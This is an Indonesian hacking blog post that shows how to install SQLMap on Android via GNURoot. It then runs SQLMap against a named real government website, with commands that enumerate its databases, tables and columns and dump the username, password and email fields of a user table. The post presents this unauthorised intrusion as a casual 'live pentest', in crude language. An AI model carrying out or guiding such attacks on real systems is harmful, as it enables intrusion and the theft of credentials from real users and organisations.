No More Yukinoshita 47. I'm Done

If You Found Every Social Media Platform Using "Yukinoshita 47" Name That's The Other Guy.

Copyright © Yukinoshita 47 | Published By Gooyaabi Templates | Powered By Blogger
Design by WebSuccessAgency | Blogger Theme by NewBloggerThemes.com | BTheme.net

My Motivation

My Motivation

Blog Archive



Seal

Always Trust Yourself And Use Your Opportunity



Kamis, 17 Agustus 2017

Menjalankan SQLMap di GNURoot Android


Hai para hacker dan yang bukan hacker udah lah tong berhenti coli nape mending lu belajar bareng GSH disini :*

Kali ini gw mau jelasin tutor yang sedikit berbeda dari biasanya yaitu menjalankan SQLMap di android

buat kalian yang belum punya GNURoot Debian sebaiknya kalian baca tutorial ini dulu : Klik Di Sini ya

jika sudah baca dan dipraktekkan kalian bisa lanjutkan untuk membaca tutorial ini :* dan buat yg mastah tanpa baca tutorial yang sebelum nya jg gpp.

pertama pastikan GNURoot terinstall


Kemudian buka GNURoot Debian


alangkah baiknya buat folder khusus pentest dulu untuk menampung tool-tool hacking nanti nya dengan memasukkan perintah mkdir pentest kemudian tekan enter.


kemudian masukkan ke dalam folder pentest tadi dengan memasukkan perintah cd pentest kemudian tekan enter


kemudian install SQLMap dengan memasukkan perintah

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

kemudian tekan enter


biarkan proses instalasi berjalan


setelah selesai masuk ke folder sqlmap dengan memasukkan perintah cd sqlmap kemudian tekan enter


beri hak akses dengan memasukkan perintah chmod 777 sqlmap.py kemudian tekan enter


kemudian update dulu sqlmap nya dengan memasukkan perintah ./sqlmap.py --update kemudian tekan enter


mari kita coba langsung praktek live pentest dengan target nya https://djk.esdm.go.id/index.php/detail-berita?ide=4325 dengan memasukkan perintah

./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 --dbs

kemudian tekan enter


biarkan proses scanning berjalan


muncul wizard buat eksekusi jenis exploitasi nya ya tekan C kemudian tekan enter


biarkan proses injeksi SQL terus berjalan secara otomatis


dan database nya ketemu cek gambar dibawah biar jelas


disini gw mau injeksi SQLnya di database djk3 untuk ngecek isi tabel SQL nya jadi perintah nya adalah

./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 -D djk3 --table

kemudian tekan enter


setelah proses scanning selesai kemudian muncul lah tabel SQL nya dari database djk3


disini gw mau injksi SQL di tabel djk3_user buat cek isi kolom nya dengan memasukkan perintah

./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 -D djk3 -T djk3_user --columns

kemudian tekan enter 


biarkan proses scanning dan injeksi berjalan


aahhh.... kimochi ketemu kolom nya :v


kemudian gw mau dump isi kolom nya djk3_user tadi dengan cara memasukkan perintah

./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 -D djk3 -T djk3_user -C id,username,password,email --dump

kemudian tekan enter.


done :v


gimana ya cara nya penggunaan nya kurang lebih sama dengan yang artikel sebelum nya yang di sini hanya saja beda nya platform aja gw bikin tutorial ini biar lu pade yang kerjaan nya sering koar-koar sambil coli ini ngerti.

oke sekian dan terimakasih

salam ngent*t
Share: